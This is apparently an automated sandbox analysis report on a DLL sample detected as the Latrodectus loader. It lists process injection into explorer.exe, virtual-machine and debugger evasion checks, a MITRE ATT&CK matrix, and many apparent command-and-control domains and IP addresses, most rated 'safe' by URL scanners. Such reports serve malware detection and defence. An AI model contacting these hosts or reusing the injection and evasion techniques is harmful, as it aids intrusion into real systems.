                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,22_2_013A5904
                      Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,22_2_013A6984
                      Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,22_2_013ADDF8
                      Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5001
                      Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 4879
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 468
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8936
                      Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 694
                      Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 672
                      Source: C:\Windows\System32\rundll32.exe API coverage: 2.5 %
                      Source: C:\Windows\System32\loaddll64.exe TID: 6660 Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep count: 5001 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep time: -300060000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep count: 4879 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep time: -292740000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7704 Thread sleep time: -224000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7728 Thread sleep time: -46800s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7704 Thread sleep time: -8936000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800192B8 FindFirstFileExW,6_2_00000001800192B8
                      Source: C:\Windows\explorer.exe Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,22_2_013A8BA8
                      Source: C:\Windows\explorer.exe Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,22_2_013A1A08
                      Source: C:\Windows\explorer.exe Code function: 22_2_013ADCE0 FindFirstFileW,22_2_013ADCE0
                      Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
                      Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000
Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: VMware
Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: Amcache.hve.9.dr | Binary or memory string: vmci.sys
Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
Source: Amcache.hve.9.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exe | API call chain: ExitProcess graph end node | graph_18-2200
Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node | graph_22-3034
Source: C:\Windows\explorer.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\rundll32.exe | Process queried: DebugPort (8 occurrences)
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000001800118B8
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW, 6_2_000000018000D1F4
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001AC34 GetProcessHeap, 6_2_000000018001AC34
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000001800118B8
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000000018000E470
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000018000D638

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Network Connect: 138.124.183.215 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 3.69.236.35 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 91.194.11.183 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 54.175.181.104 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 95.164.68.73 443
Source: C:\Windows\explorer.exe | Network Connect: 104.21.16.155 443
Source: C:\Windows\System32\rundll32.exe | Memory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 18_3_00007DF4F0240100
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 18_2_000000026E7A1370
Source: C:\Windows\System32\rundll32.exe | Thread created: C:\Windows\explorer.exe EIP: 13A0000
Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe | Memory written: PID: 2580 base: 13A0000 value: 4D
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 6516 (5 occurrences)
Source: C:\Windows\System32\rundll32.exe | Thread register set: 6516 1
Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 13A0000
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800206B0 cpuid, 6_2_00000001800206B0
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_000000018000E5BC
Source: C:\Windows\explorer.exe | Code function: 22_2_013A7318 GetUserNameA,wsprintfA, 22_2_013A7318
Source: C:\Windows\explorer.exe | Code function: 22_2_013ADB28 GetVersionExW, 22_2_013ADB28
Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information


Remote Access Functionality

MITRE ATT&CK matrix (digits preceding a technique name are the report's hit badges for that technique; cells are separated by " | "):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 912 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 912 Process Injection | LSASS Memory | 51 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Obfuscated Files or Information | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Regsvr32 | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 File and Directory Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 13 System Information Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph
Behavior Graph ID: 1439879
Sample: upfilles.dll.exe
Startdate: 11/05/2024
Architecture: WINDOWS
Score: 100

Start (sample)
  Network: workspacin.cloud; boriz400.com; 8 other IPs or domains
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Latrodectus; 5 other signatures
  -> loaddll64.exe (started)
     -> rundll32.exe (started)
        Network: altynbe.com 138.124.183.215, 443, 49750, 49757 NOKIA-ASFI Norway; anikvan.com 95.164.68.73, 443, 49754, 49755 NASSIST-ASGI Gibraltar; 3 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit); Injects code into the Windows Explorer (explorer.exe); Sets debug register (to hijack the execution of another thread); 5 other signatures
        -> explorer.exe (injected)
           Network: workspacin.cloud 104.21.16.155, 443, 49777, 49782 CLOUDFLARENETUS United States
           Signatures: System process connects to network (likely due to code injection or exploit)
           -> rundll32.exe (started)
           -> rundll32.exe (started)
     -> cmd.exe (started)
        -> rundll32.exe (started)
           Signatures: Contains functionality to inject threads in other processes
     -> rundll32.exe (started)
        -> WerFault.exe (started)
     -> 8 other processes
        -> WerFault.exe (started)
        -> WerFault.exe (started)
        -> WerFault.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection
Source | Detection | Scanner | Label | Link
upfilles.dll.dll | 16% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe |
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe |
https://outlook.com_ | 0% | URL Reputation | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure( | 0% | Avira URL Cloud | safe |
https://altynbe.com/tyk.io | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4 | 0% | Avira URL Cloud | safe |
https://anikvan.com/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/ | 0% | Avira URL Cloud | safe |
https://boriz400.com/api/azurey | 0% | Avira URL Cloud | safe |
https://illoskanawer.com/live/ | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure= | 0% | Avira URL Cloud | safe |
https://powerpoint.office.comcember | 0% | URL Reputation | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure | 0% | Avira URL Cloud | safe |
http://schemas.micro | 0% | URL Reputation | safe |
https://altynbe.com/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP | 0% | Avira URL Cloud | safe |
https://anikvan.com/I~ | 0% | Avira URL Cloud | safe |
https://anikvan.com/ | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f | 0% | Avira URL Cloud | safe |
https://boriz400.com/api/azure | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4 | 0% | Avira URL Cloud | safe |
https://anikvan.com/content.php.f | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/0vaH | 0% | Avira URL Cloud | safe |
https://altynbe.com/U~ | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/6 | 0% | Avira URL Cloud | safe |
https://altynbe.com/B_F | 0% | Avira URL Cloud | safe |
https://anikvan.com/content.phpGf | 0% | Avira URL Cloud | safe |
https://altynbe.com/content.php2f | 0% | Avira URL Cloud | safe |
https://anikvan.com/api/azuret.php.f | 0% | Avira URL Cloud | safe |
https://altynbe.com/ | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php | 0% | Avira URL Cloud | safe |
https://anikvan.com/d | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azureontent.phpMfE | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azure | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/J5 | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF | 0% | Avira URL Cloud | safe |
https://boriz400.com/qa | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/ | 0% | Avira URL Cloud | safe |
https://boriz400.com/content.php | 0% | Avira URL Cloud | safe |
https://altynbe.com/X | 0% | Avira URL Cloud | safe |
https://altynbe.com/d | 0% | Avira URL Cloud | safe |
